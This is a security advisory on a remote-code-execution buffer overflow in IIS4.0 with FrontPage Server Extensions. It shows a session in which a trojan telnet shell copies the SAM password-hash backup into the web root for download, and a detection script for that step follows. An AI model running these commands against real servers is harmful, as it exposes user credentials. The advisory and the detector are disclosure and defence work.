SNS Advisory No.13
IIS4.0 + FrontPage Server Extension Buffer Overflow Vulnerability

Problem first discovered:
Published: 19 May 2000
Last Updated: 19 May 2000

Japanese Edition: http://www.lac.co.jp/security/intelligence/SNSAdvisory/13.html
_________________________________________________________________

Overview:

We could reproduce exploitation of the buffer overrun vulnerability in IIS4.0 + FrontPage Server Extensions (Japanese environment), which makes it possible for a remote user to execute arbitrary commands.

The following pictures show snapshots of how the arbitrary code works on the target.

  Figure 1: Testing Tool
  Figure 2: Executing remote commands via injected code
  Figure 3: Example of command execution

[image: 13_1.gif]
Figure 1: Testing Tool
Sending the "ncx99.exe" file, a trojan horse that opens port 99/tcp on the machine.

[image: 13_2.gif]
Figure 2: Executing remote commands via injected code
The injected code is a tiny telnet server. Users may access the target by connecting to tcp/99 with any telnet client.

    C:\>
    C:\>ipconfig                     <-- executing ipconfig
    ipconfig

    Windows NT IP Configuration

    Ethernet adapter E100B1:

            IP Address. . . . . . . . . . . . : 172.16.99.99
            Subnet Mask . . . . . . . . . . . : 255.255.0.0
            Default Gateway . . . . . . . . . :

    C:\>
    C:\>route print                  <-- executing route print
    route print
    ============================================================
    Interface List
    0x1 ........................... MS TCP Loopback interface
    0x2 ...00 90 27 44 c5 fd ...... Intel(R) PRO PCI Adapter
    ============================================================
    ============================================================
    Active Routes:
    Network Destination        Netmask          Gateway       Interface  Metric
              127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1       1
             127.16.0.0      255.255.0.0     172.16.99.99    172.16.99.99       1
           172.16.99.99  255.255.255.255        127.0.0.1       127.0.0.1       1
         172.16.255.255  255.255.255.255     172.16.99.99    172.16.99.99       1
              224.0.0.0        224.0.0.0     172.16.99.99    172.16.99.99       1
        255.255.255.255  255.255.255.255     172.16.99.99    172.16.99.99       1

    D:\>net start "World Wide Web Publishing Service"
    net start "World Wide Web Publishing Service"
    World Wide Web Publishing Service is starting
    World Wide Web Publishing Service was started successfully

    D:\>
    D:\>cd inetpub\wwwroot
    cd inetpub\wwwroot

    D:\Inetpub\wwwroot>
    D:\Inetpub\wwwroot>copy d:\winnt\repair\sam._ .
    copy d:\winnt\repair\sam._ .
            1 file(s) copied.

It is possible to access sam._ with a browser.

Figure 3: Example of command execution
Starting the "World Wide Web Publishing Service" and copying the d:\winnt\repair\sam._ file, which contains user names and hashed passwords, to the web root directory (d:\Inetpub\wwwroot). Requesting a URL for the "sam._" file will then disclose the user names and hashed passwords.

Relevant URL:

Security Bulletin [MS00-025]
  http://www.microsoft.com/technet/security/bulletin/ms00-025.asp
Microsoft Security Bulletin (MS00-025): Frequently Asked Questions
  http://www.microsoft.com/technet/security/bulletin/fq00-025.asp

Disclaimer:
All information in these advisories is subject to change without any advance notice or mutual consensus, and each advisory is released as is. LAC Co., Ltd. is not responsible for any risks or occurrences caused by applying this information.
_________________________________________________________________
Copyright(c) 1995-2002 Little eArth Corporation

References
  2. http://www.lac.co.jp/security/index.html
  3. http://www.lac.co.jp/security/english/snsadv_e/index.html
  4. http://www.lac.co.jp/security/english/snsadv_e/14_e.html
  5. http://www.lac.co.jp/security/intelligence/SNSAdvisory/13.html
  6. http://www.microsoft.com/technet/security/bulletin/ms00-025.asp
  7. http://www.microsoft.com/technet/security/bulletin/fq00-025.asp
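The disclosure step shown in Figure 3 (a copy of winnt\repair\sam._ dropped into the web root and then fetched over HTTP) leaves two traces a defender can look for: a request for the hive backup in the IIS log, and the file itself sitting under wwwroot. The following script, added here as an example and not code from LAC or Microsoft, checks both. It assumes IIS W3C extended logs whose #Fields line names the columns, and it generalises from sam._ to the other compressed hive backups kept in the NT 4.0 repair directory (security._, system._, software._, default._); the log lines and the temporary web root it scans are constructed for the demonstration.

```python
"""Detect the Figure 3 disclosure step: a registry hive backup copied under
the web root and served over HTTP.

Added example for SNS Advisory No.13; not LAC's or Microsoft's code. Assumes
IIS W3C extended logs with a #Fields directive and a web root laid out like
d:\\Inetpub\\wwwroot. SAMPLE_LOG and the scanned directory are constructed."""

import os
import tempfile
from typing import Dict, Iterable, List

# Compressed hive backups from %SystemRoot%\repair on NT 4.0. sam._ is the
# file named in the advisory; the others are included on the assumption that
# any of them served from a web root is equally unwanted.
HIVE_BACKUPS = {"sam._", "security._", "system._", "software._", "default._"}

# Fallback column layout if a log has no #Fields directive (assumption).
LOG_FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "sc-status"]

# Constructed IIS 4.0 log excerpt: one normal page, two hive fetches that
# succeeded, one probe that got a 404, and an image request.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2000-05-19 10:01:02 172.16.1.5 GET /default.htm 200
2000-05-19 10:02:17 172.16.1.5 GET /sam._ 200
2000-05-19 10:02:40 172.16.1.9 GET /images/logo.gif 200
2000-05-19 10:03:01 172.16.1.5 GET /backup/SAM._ 404
2000-05-19 10:03:15 172.16.1.7 HEAD /security._ 200
"""


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log text into one dict per request."""
    fields = list(LOG_FIELDS)
    records: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            # Directive lines; only #Fields changes how data lines are read.
            if line.lower().startswith("#fields:"):
                fields = line.split(":", 1)[1].split()
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line; a production tool would count these
        records.append(dict(zip(fields, values)))
    return records


def hive_backup_requests(records: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return every request whose path ends in a repair-directory hive backup.

    A 2xx status means the file really was served; any other status is still
    reported, because a 404 on sam._ is a probe worth knowing about."""
    hits: List[Dict[str, object]] = []
    for rec in records:
        stem = rec.get("cs-uri-stem", "")
        name = stem.rsplit("/", 1)[-1].lower()  # case-insensitive, like NTFS
        if name in HIVE_BACKUPS:
            status = rec.get("sc-status", "")
            hits.append({
                "client": rec.get("c-ip", "?"),
                "uri": stem,
                "status": status,
                "served": status.startswith("2"),
            })
    return hits


def find_hive_backups_under(webroot: str) -> List[str]:
    """Walk a web root and list any hive backup files copied into it."""
    found: List[str] = []
    for dirpath, _dirs, files in os.walk(webroot):
        for fname in files:
            if fname.lower() in HIVE_BACKUPS:
                found.append(os.path.relpath(os.path.join(dirpath, fname), webroot))
    return sorted(found)


def demo_webroot_check() -> List[str]:
    """Scan a throwaway web root that contains a copied sam._ (constructed)."""
    with tempfile.TemporaryDirectory() as root:
        open(os.path.join(root, "default.htm"), "w").close()
        open(os.path.join(root, "sam._"), "w").close()
        return find_hive_backups_under(root)


if __name__ == "__main__":
    for hit in hive_backup_requests(parse_iis_log(SAMPLE_LOG)):
        flag = "SERVED" if hit["served"] else "probe"
        print(f"{flag:6} {hit['client']} {hit['uri']} ({hit['status']})")
    print("hive backups under web root:", demo_webroot_check())
```

Run against real logs, point parse_iis_log at the daily W3C file and find_hive_backups_under at every configured web root, not just the default one. A served hit is evidence that hashes have already left the machine, so it calls for the MS00-025 patch plus a credential reset, whereas a 404 probe is a reason to check the rest of that client's requests.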